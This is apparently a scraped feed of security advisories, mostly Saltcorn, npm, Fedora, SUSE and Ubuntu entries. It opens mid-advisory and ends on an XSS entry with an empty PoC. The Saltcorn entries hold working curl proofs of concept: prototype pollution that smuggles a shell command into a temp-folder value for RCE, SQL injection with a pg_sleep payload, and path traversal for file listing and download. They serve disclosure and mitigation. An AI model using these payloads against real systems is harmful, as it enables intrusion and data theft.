  "/localizer/save-string/:lang/:defstring",
  isAdmin,
  error_catcher(async (req, res) => {
    const { lang, defstring } = req.params; // source
    const cfgStrings = getState().getConfigCopy("localizer_strings");
    if (cfgStrings[lang]) cfgStrings[lang][defstring] = text(req.body.value); // [1] sink
    else cfgStrings[lang] = { [defstring]: text(req.body.value) };
    await getState().setConfig("localizer_strings", cfgStrings);
    res.redirect(`/site-structure/localizer/edit/${lang}`);
  })
);
```
### PoC
Setup:
- set `SALTCORN_NWORKERS=1` before starting the `saltcorn` server (to easily observe the behavior of the PoC)
```
SALTCORN_NWORKERS=1 saltcorn serve
```
- make sure to use the PostgreSQL backend
- login with a user with admin permission
#### RCE
This PoC demonstrates how to escalate the Prototype Pollution vulnerability to change the behavior of certain executed commands.
- check that the file that will be created does not exist:
```
cat /tmp/RCE
cat: /tmp/RCE: No such file or directory
```
- pollute the `Object.prototype` with a `tempRootFolder` value set to `;echo+"rce"|tee+/tmp/RCE;` by sending the following request ***:
```bash
curl -i -X $'POST' \
  -H $'Host: localhost:3000' \
  -H $'Content-Type: application/x-www-form-urlencoded; charset=UTF-8' \
  -H $'Accept: */*' \
  -H $'Origin: http://localhost:3000' \
  -H $'Connection: close' \
  -b $'loggedin=true; connect.sid=VALID_CONNECT_SID_COOKIE' \
  --data-binary $'_csrf=VALID_csrf_Value&value=;echo+"rce"|tee+/tmp/RCE;' \
  $'http://localhost:3000/site-structure/localizer/save-string/__proto__/tempRootFolder'
```
- visit `http://localhost:3000/plugins/new`
- enter the following fields:
  - Name: `test`
  - Source: `git`
  - other fields blank
- click `Create`
- you will get an error but the command `echo "rce" | tee /tmp/RCE` will be executed
- to verify:
```
cat /tmp/RCE
rce
```
The RCE occurs because after the previous curl request, the `tempRootFolder` property is set to `;echo+"rce"|tee+/tmp/RCE;`, which is later used to build the shell commands.
- file: https://github.com/saltcorn/saltcorn/blob/v1.0.0-beta.13/packages/plugins-loader/plugin_installer.js#L45-L58
```js
class PluginInstaller {
  constructor(plugin, opts = {}) { // opts will have the tempRootFolder property set with dangerous values // [2]
    [...]
    this.tempRootFolder =
      opts.tempRootFolder || envPaths("saltcorn", { suffix: "tmp" }).temp; // [3]
    [...]
    this.pckJsonPath = join(this.pluginDir, "package.json");
    this.tempDir = join(this.tempRootFolder, "temp_install", ...tokens); // [4]
    [...]
  }
  [...]
}
```
#### SQL Injection
This PoC demonstrates how to escalate the Prototype Pollution vulnerability to change the behavior of certain SQL queries (i.e. SQLi).
- visit `http://localhost:3000/table` to check the page returns some results (no errors)
- pollute the `Object.prototype` with a `schema` value set to `"` (just to create an exception in the query that will be executed to demonstrate the issue) by sending the following request ***:
```bash
curl -i -X $'POST' \
  -H $'Host: localhost:3000' \
  -H $'Content-Type: application/x-www-form-urlencoded; charset=UTF-8' \
  -H $'Accept: */*' \
  -H $'Origin: http://localhost:3000' \
  -H $'Connection: close' \
  -b $'loggedin=true; connect.sid=VALID_CONNECT_SID_COOKIE' \
  --data-binary $'_csrf=VALID_csrf_Value&value=\"' \
  $'http://localhost:3000/site-structure/localizer/save-string/__proto__/schema'
```
- visit again `http://localhost:3000/table` but this time an SQL error will appear:
```
syntax error at or near "" order by lower(""
```
**NOTE**: Another payload to use as `value` could be `pg_user"+WHERE+1=1+AND+(SELECT+pg_sleep(5))+IS+NOT+NULL+--`
The SQL injection occurs because after the previous curl request, the `schema` property is set to `"`.
- file: https://github.com/saltcorn/saltcorn/blob/v1.0.0-beta.13/packages/postgres/postgres.js#L101
```js
const select = async (tbl, whereObj, selectopts = {}) => { // [2] selectopts
  const { where, values } = mkWhere(whereObj);
  const schema = selectopts.schema || getTenantSchema(); // [3] selectopts.schema
  const sql = `SELECT ${
    selectopts.fields ? selectopts.fields.join(", ") : `*`
  } FROM "${schema}"."${sqlsanitize(tbl)}" ${where} ${mkSelectOptions( // [4] schema
    selectopts,
    values,
    false
  )}`;
  sql_log(sql, values);
  const tq = await (client || selectopts.client || pool).query(sql, values);
  return tq.rows;
};
```
*** Retrieve valid values for the `connect.sid` (`VALID_CONNECT_SID_COOKIE`) and `_csrf` values (`VALID_csrf_Value`):
- open the browser developer console and go to the `Network` tab
- visit `http://localhost:3000/site-structure/localizer/add-lang`
- add a language (`Name: test`, `Locale: test`) and click `Save`
- under the `Network` tab, filter for `save-lang` and check the request parameters (`Headers` and `Payload`/`Request` tabs)
- copy the values for `connect.sid` and `_csrf` and paste them in the curl command above
### Impact
Remote code execution (RCE), SQL injection and business logic errors.
### Recommended Mitigation
Check the values of the `lang` and `defstring` parameters against dangerous properties like `__proto__`, `constructor`, `prototype`.
Link: https://secdb.nttzen.cloud/security-advisory/npm/NPM:GHSA-78P3-FWCQ-62C2

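The sink at [1] works because `cfgStrings["__proto__"]` is `Object.prototype`, so a write through it lands on every plain object in the process, including the `opts` and `selectopts` objects the gadgets at [2] read from. The following is an added example, not Saltcorn's code: it reproduces that assignment shape in isolation, shows a stand-in gadget picking up the polluted value, and beside it the mitigation the advisory recommends (reject `__proto__`, `constructor` and `prototype` as keys) combined with own-property checks and a null-prototype store. `saveStringVulnerable`, `saveStringSafe`, `pickTempRoot` and `demo` are names chosen for this example.

```javascript
// Added example, not Saltcorn's code. Function names are assumptions.

// Vulnerable shape from the advisory: lang and defstring come straight from
// the URL and are used as property keys on a plain object. With
// lang = "__proto__", cfgStrings[lang] is Object.prototype (truthy), so the
// second line writes defstring onto the shared prototype.
function saveStringVulnerable(cfgStrings, lang, defstring, value) {
  if (cfgStrings[lang]) cfgStrings[lang][defstring] = value;
  else cfgStrings[lang] = { [defstring]: value };
  return cfgStrings;
}

const FORBIDDEN_KEYS = new Set(["__proto__", "constructor", "prototype"]);

function assertSafeKey(key) {
  if (typeof key !== "string" || FORBIDDEN_KEYS.has(key)) {
    throw new Error(`refusing to use ${JSON.stringify(key)} as a property name`);
  }
}

// Hardened shape: reject prototype keys, follow only own properties, and
// keep the store on a null-prototype object so there is no prototype to hit
// even if a future key slips past the blocklist.
function saveStringSafe(cfgStrings, lang, defstring, value) {
  assertSafeKey(lang);
  assertSafeKey(defstring);
  const store = Object.assign(Object.create(null), cfgStrings);
  const bucket = Object.hasOwn(store, lang) ? store[lang] : Object.create(null);
  bucket[defstring] = value;
  store[lang] = bucket;
  return store;
}

// Stand-in for the PluginInstaller gadget at [2]/[3]: an options object the
// caller never populated, so an inherited tempRootFolder wins over the default.
function pickTempRoot(opts = {}) {
  return opts.tempRootFolder || "/var/tmp/saltcorn";
}

// Run the attack against both versions, then remove the pollution again so
// the rest of the process is unaffected.
function demo() {
  const payload = ';echo "rce"|tee /tmp/RCE;';
  saveStringVulnerable({}, "__proto__", "tempRootFolder", payload);
  const polluted = pickTempRoot();          // now returns the payload
  delete Object.prototype.tempRootFolder;   // clean up
  const clean = pickTempRoot();             // default again
  let rejected = false;
  try {
    saveStringSafe({}, "__proto__", "tempRootFolder", payload);
  } catch (e) {
    rejected = true;
  }
  return { polluted, clean, rejected };
}
```

The same `pickTempRoot` pattern is what turns the `schema` pollution into SQL injection at [3] in `select`: `selectopts.schema` is read from an object that was never given a `schema`, so the inherited value is interpolated into the `FROM "${schema}"` clause unquoted.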
03.10.2024 22:46:45 | npm | [NPM:GHSA-CFQX-F43M-VFH7] @saltcorn/server arbitrary file and directory listing when accessing build mobile app results (moderate)
### Summary
A user with admin permission can read arbitrary file and directory names on the filesystem by calling the `admin/build-mobile-app/result?build_dir_name=` endpoint. The `build_dir_name` parameter is not properly validated and it's then used to construct the `buildDir` that is read. The file/directory names under the `buildDir` will be returned.
### Details
- file: https://github.com/saltcorn/saltcorn/blob/v1.0.0-beta.13/packages/server/routes/admin.js#L2884-L2893
```js
router.get(
  "/build-mobile-app/result",
  isAdmin,
  error_catcher(async (req, res) => {
    const { build_dir_name } = req.query; // [1] source
    const rootFolder = await File.rootFolder();
    const buildDir = path.join(
      rootFolder.location,
      "mobile_app",
      build_dir_name // [2]
    );
    const files = await Promise.all(
      fs
        .readdirSync(buildDir) // [3] sink
        .map(async (outFile) => await File.from_file_on_disk(outFile, buildDir))
    );
    [...]
  })
);
```
### PoC
- log into the application as an admin user
- visit the following url: `http://localhost:3000/admin/build-mobile-app/result?build_dir_name=/../../../../../../../../`
**NOTE**: it's possible to only see file and directory names but not to download their content.
### Impact
Information disclosure
### Recommended Mitigation
Resolve the `buildDir` and check if it starts with `${rootFolder.location}/mobile_app`.
Link: https://secdb.nttzen.cloud/security-advisory/npm/NPM:GHSA-CFQX-F43M-VFH7

03.10.2024 22:46:15 | npm | [NPM:GHSA-277H-PX4M-62Q8] @saltcorn/server arbitrary file zip read and download when downloading auto backups (moderate)
### Summary
A user with admin permission can read and download arbitrary zip files when downloading auto backups. The file name used to identify the zip file is not properly sanitized when passed to the `res.download` API.
### Details
- file: https://github.com/saltcorn/saltcorn/blob/v1.0.0-beta.13/packages/server/routes/admin.js#L671-L682
```js
router.get(
  "/auto-backup-download/:filename",
  isAdmin,
  error_catcher(async (req, res) => {
    const { filename } = req.params; // [1] source
    [...]
    if (
      !isRoot ||
      !(filename.startsWith(backup_file_prefix) && filename.endsWith(".zip")) // [2]
    ) {
      res.redirect("/admin/backup");
      return;
    }
    const auto_backup_directory = getState().getConfig("auto_backup_directory");
    res.download(path.join(auto_backup_directory, filename), filename); // [3] sink
  })
);
```
### Steps to reproduce (PoC)
- create a file with `.zip` extension under the `/tmp` folder:
```
echo "secret12345" > /tmp/secret.zip
```
- log into the application as an admin user
- visit the url `http://localhost:3000/admin/auto-backup-download/sc-backup-%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2ftmp%2fsecret.zip`
- download the zip file and then check if the zip was indeed downloaded:
```bash
cat secret.zip
secret12345
```
- Alternatively send the following request to retrieve the file just created.
```bash
curl -i -X $'GET' \
  -H $'Host: localhost:3000' \
  -H $'Connection: close' \
  -b $'connect.sid=VALID_CONNECT_SID_COOKIE' \
  $'http://localhost:3000/admin/auto-backup-download/sc-backup-%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2ftmp%2fsecret.zip'
```
**NOTE**: To obtain a valid `connect.sid` cookie, just open the developer console while logged in and retrieve the cookie value.
### Impact
Arbitrary zip file download (information disclosure).
### Recommended Mitigation
Resolve the `filename` parameter before checking if it starts with `backup_file_prefix`.
Link: https://secdb.nttzen.cloud/security-advisory/npm/NPM:GHSA-277H-PX4M-62Q8

03.10.2024 21:26:53 | npm | [NPM:GHSA-593M-55HH-J8GV] Sentry SDK Prototype Pollution gadget in JavaScript SDKs (moderate)

### Impact

In case a Prototype Pollution vulnerability is present in a user's application or bundled libraries, the Sentry SDK could potentially serve as a gadget to exploit that vulnerability. The exploitability depends on the specific details of the underlying Prototype Pollution issue.

> [!NOTE]
> This advisory does not indicate the presence of a Prototype Pollution within the Sentry SDK itself. Users are strongly advised to first address any Prototype Pollution vulnerabilities in their application, as they pose a more critical security risk.

### Patches

The issue was patched in all Sentry JavaScript SDKs starting from the [8.33.0](https://github.com/getsentry/sentry-javascript/releases/tag/8.33.0) version.

### References

* [Prototype Pollution](https://portswigger.net/web-security/prototype-pollution)
* [Prototype Pollution gadgets](https://portswigger.net/web-security/prototype-pollution#prototype-pollution-gadgets)
* [sentry-javascript#13838](https://github.com/getsentry/sentry-javascript/pull/13838)

https://secdb.nttzen.cloud/security-advisory/npm/NPM:GHSA-593M-55HH-J8GV
03.10.2024 21:41:12 | npm | [NPM:GHSA-QC4V-XQ2M-65WC] Unexpected visibility of environment variable configurations in @backstage/plugin-app-backend (moderate)

### Impact

Configuration supplied through `APP_CONFIG_*` environment variables, for example `APP_CONFIG_backend_listen_port=7007`, was unexpectedly ignoring the visibility defined in the configuration schema. This occurred even if the configuration schema specified that they should have backend or secret visibility. This was an intended feature of the `APP_CONFIG_*` way of supplying configuration, but now clearly goes against the expected behavior of the configuration system. This behavior leads to a risk of potentially exposing sensitive configuration details intended to remain private or restricted to backend processes.

### Patches

The issue has been resolved in version `0.3.75` of the `@backstage/plugin-app-backend` package. Users are encouraged to upgrade to this version to mitigate the vulnerability.

### Workarounds

As a temporary measure, avoid supplying secrets using the `APP_CONFIG_` configuration pattern. Consider alternative methods for setting secrets, such as the [environment substitution](https://backstage.io/docs/conf/writing#environment-variable-substitution) available for Backstage configuration.

### References

If you have any questions or comments about this advisory:

- Open an issue in the [Backstage repository](https://github.com/backstage/backstage)
- Visit our Discord, linked to in [Backstage README](https://github.com/backstage/backstage)

https://secdb.nttzen.cloud/security-advisory/npm/NPM:GHSA-QC4V-XQ2M-65WC
03.10.2024 17:24:55 | ubuntu | [USN-7055-1] FreeRADIUS vulnerability | A system authentication measure could be bypassed. | https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-7055-1
03.10.2024 17:10:36 | ubuntu | [USN-7053-1] ImageMagick vulnerabilities | Several security issues were fixed in ImageMagick. | https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-7053-1
03.10.2024 16:06:07 | suse | [SUSE-SU-2024:3519-1] Security update for MozillaFirefox (important) | Security update for MozillaFirefox | https://secdb.nttzen.cloud/security-advisory/suse/SUSE-SU-2024:3519-1
03.10.2024 16:04:32 | suse | [SUSE-SU-2024:3518-1] Security update for MozillaFirefox (important) | Security update for MozillaFirefox | https://secdb.nttzen.cloud/security-advisory/suse/SUSE-SU-2024:3518-1
03.10.2024 19:52:56 | maven | [MAVEN:GHSA-R7PG-V2C8-MFG3] Apache Avro Java SDK: Arbitrary Code Execution when reading Avro Data (Java SDK) (critical) | Schema parsing in the Java SDK of Apache Avro 1.11.3 and previous versions allows bad actors to execute arbitrary code. Users are recommended to upgrade to version 1.11.4 or 1.12.0, which fix this issue. | https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-R7PG-V2C8-MFG3
03.10.2024 19:52:26 | maven | [MAVEN:GHSA-78WR-2P64-HPWJ] Apache Commons IO: Possible denial of service attack on untrusted input to XmlStreamReader (high) | Uncontrolled Resource Consumption vulnerability in Apache Commons IO. The `org.apache.commons.io.input.XmlStreamReader` class may excessively consume CPU resources when processing maliciously crafted input. This issue affects Apache Commons IO: from 2.0 before 2.14.0. Users are recommended to upgrade to version 2.14.0 or later, which fixes the issue. | https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-78WR-2P64-HPWJ
03.10.2024 15:03:40 | suse | [SUSE-SU-2024:3517-1] Security update for opensc (low) | Security update for opensc | https://secdb.nttzen.cloud/security-advisory/suse/SUSE-SU-2024:3517-1
03.10.2024 14:53:28 | ubuntu | [USN-7054-1] unzip vulnerability | unzip could be made to crash or run programs as your login if it opened a specially crafted file. | https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-7054-1
03.10.2024 14:33:45 | suse | [SUSE-SU-2024:3516-1] Security update for libpcap (moderate) | Security update for libpcap | https://secdb.nttzen.cloud/security-advisory/suse/SUSE-SU-2024:3516-1
03.10.2024 14:33:36 | suse | [SUSE-SU-2024:3515-1] Security update for expat (moderate) | Security update for expat | https://secdb.nttzen.cloud/security-advisory/suse/SUSE-SU-2024:3515-1
05.10.2024 04:54:15 | fedora | [FEDORA-2024-452b60addf] Fedora 40: chromium (high)
update to 129.0.6668.89
High CVE-2024-7025: Integer overflow in Layout
High CVE-2024-9369: Insufficient data validation in Mojo
High CVE-2024-9370: Inappropriate implementation in V8
https://secdb.nttzen.cloud/security-advisory/fedora/FEDORA-2024-452b60addf
05.10.2024 03:18:01 | fedora | [FEDORA-2024-7908ee39a9] Fedora 41: aws (high)
CVE-2024-41708: Ada Web Server did not use a cryptographically secure pseudorandom number generator.
AWS.Utils.Random and AWS.Utils.Random_String used Ada.Numerics.Discrete_Random, which is not designed to be cryptographically secure. Random_String also introduced a bias in the generated pseudorandom string values, where the values "1" and "2" had a much higher frequency than any other character.
The internal state of the Mersenne Twister PRNG could be revealed, and lead to a session hijacking attack.
This update fixes the problem by using /dev/urandom instead of Discrete_Random.
More details: https://docs.adacore.com/corp/security-advisories/SEC.AWS-0040-v2.pdf
https://secdb.nttzen.cloud/security-advisory/fedora/FEDORA-2024-7908ee39a9
05.10.2024 03:17:57 | fedora | [FEDORA-2024-9e55564ca7] Fedora 41: python-gcsfs (medium) | Update to new upstream version (closes rhbz#2237124) | https://secdb.nttzen.cloud/security-advisory/fedora/FEDORA-2024-9e55564ca7
05.10.2024 03:17:49 | fedora | [FEDORA-2024-1c078a4771] Fedora 41: znc, znc-push, znc-clientbuffer (critical) | Fix CVE-2024-39844 https://wiki.znc.in/ChangeLog/1.9.0 | https://secdb.nttzen.cloud/security-advisory/fedora/FEDORA-2024-1c078a4771
04.10.2024 23:31:01 | npm | [NPM:GHSA-PXG6-PF52-XH8X] cookie accepts cookie name, path, and domain with out of bounds characters (low)

### Impact

The cookie name could be used to set other fields of the cookie, resulting in an unexpected cookie value. For example, `serialize("userName=<script>alert('XSS3')</script>; Max-Age=2592000; a", value)` would result in `"userName=<script>alert('XSS3')</script>; Max-Age=2592000; a=test"`, setting `userName` cookie to `<script>` and ignoring `value`.

A similar escape can be used for `path` and `domain`, which could be abused to alter other fields of the cookie.

### Patches

Upgrade to 0.7.0, which updates the validation for `name`, `path`, and `domain`.

### Workarounds

Avoid passing untrusted or arbitrary values for these fields; ensure they are set by the application instead of user input.

### References

* https://github.com/jshttp/cookie/pull/167

https://secdb.nttzen.cloud/security-advisory/npm/NPM:GHSA-PXG6-PF52-XH8X
04.10.2024 21:50:57 | npm | [NPM:GHSA-8XQ9-G7CH-35HG] Parse Server's custom object ID allows to acquire role privileges (high)

### Impact

If the Parse Server option `allowCustomObjectId: true` is set, an attacker that is allowed to create a new user can set a custom object ID for that new user that exploits the vulnerability and acquires privileges of a specific role.

### Patches

Improved validation for custom user object IDs. Session tokens for existing users with an object ID that exploits the vulnerability are now rejected.

### Workarounds

- Disable custom object IDs by setting `allowCustomObjectId: false` or not setting the option which defaults to `false`.
- Use a Cloud Code Trigger to validate that a new user's object ID doesn't start with the prefix `role:`.

### References

- https://github.com/parse-community/parse-server/security/advisories/GHSA-8xq9-g7ch-35hg
- https://github.com/parse-community/parse-server/pull/9317 (fix for Parse Server 7)
- https://github.com/parse-community/parse-server/pull/9318 (fix for Parse Server 6)

https://secdb.nttzen.cloud/security-advisory/npm/NPM:GHSA-8XQ9-G7CH-35HG
04.10.2024 17:40:29 | suse | [SUSE-SU-2024:3533-1] Security update for pcp (important) | Security update for pcp | https://secdb.nttzen.cloud/security-advisory/suse/SUSE-SU-2024:3533-1
04.10.2024 17:29:54 | suse | [SUSE-SU-2024:3532-1] Security update for openvpn (moderate) | Security update for openvpn | https://secdb.nttzen.cloud/security-advisory/suse/SUSE-SU-2024:3532-1
04.10.2024 16:30:11 | suse | [SUSE-SU-2024:3458-1] Security update for kubernetes1.24 (important) | Security update for kubernetes1.24 | https://secdb.nttzen.cloud/security-advisory/suse/SUSE-SU-2024:3458-1
04.10.2024 16:28:41 | suse | [SUSE-SU-2024:3453-1] Security update for kubernetes1.24 (important) | Security update for kubernetes1.24 | https://secdb.nttzen.cloud/security-advisory/suse/SUSE-SU-2024:3453-1
04.10.2024 16:25:20 | suse | [SUSE-SU-2024:3526-1] Security update for Mesa (moderate) | Security update for Mesa | https://secdb.nttzen.cloud/security-advisory/suse/SUSE-SU-2024:3526-1
04.10.2024 16:21:09 | suse | [SUSE-SU-2024:3525-1] Security update for openssl-3 (important) | Security update for openssl-3 | https://secdb.nttzen.cloud/security-advisory/suse/SUSE-SU-2024:3525-1
04.10.2024 16:18:41 | suse | [SUSE-SU-2024:3524-1] Security update for frr (important) | Security update for frr | https://secdb.nttzen.cloud/security-advisory/suse/SUSE-SU-2024:3524-1
04.10.2024 16:17:15 | suse | [SUSE-SU-2024:3523-1] Security update for cups-filters (critical) | Security update for cups-filters | https://secdb.nttzen.cloud/security-advisory/suse/SUSE-SU-2024:3523-1
04.10.2024 21:51:46 | maven | [MAVEN:GHSA-WWCP-26WC-3FXM] JSON-lib mishandles an unbalanced comment string (moderate) | util/JSONTokener.java in JSON-lib before 3.1.0 mishandles an unbalanced comment string. | https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-WWCP-26WC-3FXM
04.10.2024 08:27:10 | almalinux | [ALSA-2024:7505] firefox security update (important) | firefox security update | https://secdb.nttzen.cloud/security-advisory/almalinux/ALSA-2024:7505
04.10.2024 08:25:09 | almalinux | [ALSA-2024:7552] thunderbird security update (important) | thunderbird security update | https://secdb.nttzen.cloud/security-advisory/almalinux/ALSA-2024:7552
04.10.2024 15:13:50 | rubysec | [RUBYSEC:OPENC3-2024-43795] OpenC3 Cross-site Scripting in Login functionality (`GHSL-2024-128`)

### Summary

The login functionality contains a reflected cross-site scripting (XSS) vulnerability.

Note: This CVE only affects Open Source Edition, and not OpenC3 COSMOS Enterprise Edition

### Impact

This issue may lead up to Remote Code Execution (RCE).

**NOTE:** The complete advisory with much more information is added as [comment](https://github.com/OpenC3/cosmos/security/advisories/GHSA-vfj8-5pj7-2f9g#advisory-comment-104904).

https://secdb.nttzen.cloud/security-advisory/rubysec/RUBYSEC:OPENC3-2024-43795
04.10.2024 15:13:50 | rubysec | [RUBYSEC:OPENC3-2024-46977] OpenC3 Path Traversal via screen controller (`GHSL-2024-127`)

### Summary

A path traversal vulnerability inside of `LocalMode`'s `open_local_file` method allows an authenticated user with adequate permissions to download any `.txt` via the `ScreensController#show` on the web server COSMOS is running on (depending on the file permissions).

Note: This CVE affects all OpenC3 COSMOS Editions

### Impact

This issue may lead to Information Disclosure.

**NOTE:** The complete advisory with much more information is added as [comment](https://github.com/OpenC3/cosmos/security/advisories/GHSA-8jxr-mccc-mwg8#advisory-comment-104903).

https://secdb.nttzen.cloud/security-advisory/rubysec/RUBYSEC:OPENC3-2024-46977
04.10.2024 15:13:50 | rubysec | [RUBYSEC:OPENC3-2024-47529] OpenC3 stores passwords in clear text (`GHSL-2024-129`) (medium)

### Summary

OpenC3 COSMOS stores the password of a user unencrypted in the LocalStorage of a web browser. This makes the user password susceptible to exfiltration via Cross-site scripting (see GHSL-2024-128).

Note: This CVE only affects Open Source edition, and not OpenC3 COSMOS Enterprise Edition

### Impact

This issue may lead to Information Disclosure.

**NOTE:** The complete advisory with much more information is added as [comment](https://github.com/OpenC3/cosmos/security/advisories/GHSA-4xqv-47rm-37mm#advisory-comment-104905).

https://secdb.nttzen.cloud/security-advisory/rubysec/RUBYSEC:OPENC3-2024-47529
06.10.2024 05:12:53 | fedora | [FEDORA-2024-5c99e1d579] Fedora 40: p7zip | Fix wrapper to hide password from process history | https://secdb.nttzen.cloud/security-advisory/fedora/FEDORA-2024-5c99e1d579
06.10.2024 05:12:52 | fedora | [FEDORA-2024-c07e065747] Fedora 40: unbound (medium) | Fixes CVE-2024-8508 https://github.com/NLnetLabs/unbound/releases/tag/release-1.21.1 | https://secdb.nttzen.cloud/security-advisory/fedora/FEDORA-2024-c07e065747
06.10.2024 05:12:26 | fedora | [FEDORA-2024-63f98f8c60] Fedora 40: aws (high)
CVE-2024-41708: Ada Web Server did not use a cryptographically secure pseudorandom number generator.
AWS.Utils.Random and AWS.Utils.Random_String used Ada.Numerics.Discrete_Random, which is not designed to be cryptographically secure. Random_String also introduced a bias in the generated pseudorandom string values, where the values "1" and "2" had a much higher frequency than any other character.
The internal state of the Mersenne Twister PRNG could be revealed, and lead to a session hijacking attack.
This update fixes the problem by using /dev/urandom instead of Discrete_Random.
More details: https://docs.adacore.com/corp/security-advisories/SEC.AWS-0040-v2.pdf
https://secdb.nttzen.cloud/security-advisory/fedora/FEDORA-2024-63f98f8c60
06.10.2024 04:26:37 | fedora | [FEDORA-2024-7aba3c1531] Fedora 39: chromium (high)
update to 129.0.6668.89
High CVE-2024-7025: Integer overflow in Layout
High CVE-2024-9369: Insufficient data validation in Mojo
High CVE-2024-9370: Inappropriate implementation in V8
https://secdb.nttzen.cloud/security-advisory/fedora/FEDORA-2024-7aba3c1531
06.10.2024 04:26:27 | fedora | [FEDORA-2024-d940f25a53] Fedora 39: aws (high)
CVE-2024-41708: Ada Web Server did not use a cryptographically secure pseudorandom number generator.
AWS.Utils.Random and AWS.Utils.Random_String used Ada.Numerics.Discrete_Random, which is not designed to be cryptographically secure. Random_String also introduced a bias in the generated pseudorandom string values, where the values "1" and "2" had a much higher frequency than any other character.
The internal state of the Mersenne Twister PRNG could be revealed, and lead to a session hijacking attack.
This update fixes the problem by using /dev/urandom instead of Discrete_Random.
More details: https://docs.adacore.com/corp/security-advisories/SEC.AWS-0040-v2.pdf
https://secdb.nttzen.cloud/security-advisory/fedora/FEDORA-2024-d940f25a53
06.10.2024 03:14:43 | fedora | [FEDORA-2024-b142cc07d0] Fedora 41: webkitgtk (medium)
Fix login QR code not shown in WhatsApp web.
Disable PSON by default again in GTK 3 API versions.
Disable DMABuf video sink by default to prevent file descriptor leaks.
Fix several crashes and rendering issues.
Use Skia instead of cairo for 2D rendering and enable GPU rendering by default.
Enable offscreen canvas by default.
Add support for system tracing with Sysprof.
Implement printing using the Print portal.
Add new API to load settings from a config file.
Add a new setting to enable or disable the 2D canvas acceleration (enabled by default).
Undeprecate console messages API and make it available in 6.0 API.
https://secdb.nttzen.cloud/security-advisory/fedora/FEDORA-2024-b142cc07d0
05.10.2024 14:36:30 | rubysec | [RUBYSEC:OPENC3-2024-43795] OpenC3 Cross-site Scripting in Login functionality (`GHSL-2024-128`) (medium)

### Summary

The login functionality contains a reflected cross-site scripting (XSS) vulnerability.

Note: This CVE only affects Open Source Edition, and not OpenC3 COSMOS Enterprise Edition

### Impact

This issue may lead up to Remote Code Execution (RCE).

**NOTE:** The complete advisory with much more information is added as [comment](https://github.com/OpenC3/cosmos/security/advisories/GHSA-vfj8-5pj7-2f9g#advisory-comment-104904).

https://secdb.nttzen.cloud/security-advisory/rubysec/RUBYSEC:OPENC3-2024-43795
05.10.2024 14:36:30 | rubysec | [RUBYSEC:OPENC3-2024-46977] OpenC3 Path Traversal via screen controller (`GHSL-2024-127`) (medium)

### Summary

A path traversal vulnerability inside of `LocalMode`'s `open_local_file` method allows an authenticated user with adequate permissions to download any `.txt` via the `ScreensController#show` on the web server COSMOS is running on (depending on the file permissions).

Note: This CVE affects all OpenC3 COSMOS Editions

### Impact

This issue may lead to Information Disclosure.

**NOTE:** The complete advisory with much more information is added as [comment](https://github.com/OpenC3/cosmos/security/advisories/GHSA-8jxr-mccc-mwg8#advisory-comment-104903).

https://secdb.nttzen.cloud/security-advisory/rubysec/RUBYSEC:OPENC3-2024-46977
07.10.2024 12:41:38 | ubuntu | [USN-7043-3] cups-filters vulnerability | cups-filters could be made to run programs if it received specially crafted network traffic. | https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-7043-3
07.10.2024 11:42:52 | ubuntu | [USN-7041-3] CUPS vulnerability | CUPS could be made to crash or run programs if it received specially crafted network traffic. | https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-7041-3
07.10.2024 06:43:04 | ubuntu | [USN-7056-1] Firefox vulnerabilities | Several security issues were fixed in Firefox. | https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-7056-1
07.10.2024 04:17:51 | fedora | [FEDORA-2024-86edbf4d85] Fedora 39: firefox | New upstream version (131.0) | https://secdb.nttzen.cloud/security-advisory/fedora/FEDORA-2024-86edbf4d85
07.10.2024 03:16:16 | fedora | [FEDORA-2024-4944ad2c87] Fedora 41: pgadmin4 (critical) | Fix CVE-2024-9014. | https://secdb.nttzen.cloud/security-advisory/fedora/FEDORA-2024-4944ad2c87
08.10.2024 04:48:58 | fedora | [FEDORA-2024-e1357fc22f] Fedora 39: webkitgtk (medium)
Fix login QR code not shown in WhatsApp web.
Disable PSON by default again in GTK 3 API versions.
Disable DMABuf video sink by default to prevent file descriptor leaks.
Fix several crashes and rendering issues.
Use Skia instead of cairo for 2D rendering and enable GPU rendering by default.
Enable offscreen canvas by default.
Add support for system tracing with Sysprof.
Implement printing using the Print portal.
Add new API to load settings from a config file.
Add a new setting to enable or disable the 2D canvas acceleration (enabled by default).
Undeprecate console messages API and make it available in 6.0 API.
https://secdb.nttzen.cloud/security-advisory/fedora/FEDORA-2024-e1357fc22f
08.10.2024 04:38:58 | fedora | [FEDORA-2024-4c6304b6fa] Fedora 40: webkitgtk (medium)
Fix login QR code not shown in WhatsApp web.
Disable PSON by default again in GTK 3 API versions.
Disable DMABuf video sink by default to prevent file descriptor leaks.
Fix several crashes and rendering issues.
Use Skia instead of cairo for 2D rendering and enable GPU rendering by default.
Enable offscreen canvas by default.
Add support for system tracing with Sysprof.
Implement printing using the Print portal.
Add new API to load settings from a config file.
Add a new setting to enable or disable the 2D canvas acceleration (enabled by default).
Undeprecate console messages API and make it available in 6.0 API.
https://secdb.nttzen.cloud/security-advisory/fedora/FEDORA-2024-4c6304b6fa
07.10.2024 18:14:41 | npm | [NPM:GHSA-PF56-H9QF-RXQ4] Saltcorn Server Stored Cross-Site Scripting (XSS) in event logs page (moderate)

### Summary

Event log data is not properly sanitized, leading to a stored Cross-Site Scripting (XSS) vulnerability.

### Details

- file: https://github.com/saltcorn/saltcorn/blob/v1.0.0-beta.13/packages/server/routes/eventlog.js#L445

```js
router.get(
  "/:id",
  isAdmin,
  error_catcher(async (req, res) => {
    const { id } = req.params;
    const ev = await EventLog.findOneWithUser(id);
    send_events_page({
      [...]
      contents: {
        type: "card",
        contents:
          [...]
          ) +
          div(
            { class: "eventpayload" },
            ev.payload ? pre(JSON.stringify(ev.payload, null, 2)) : "" //<---
          ),
      },
    });
  })
```

### PoC

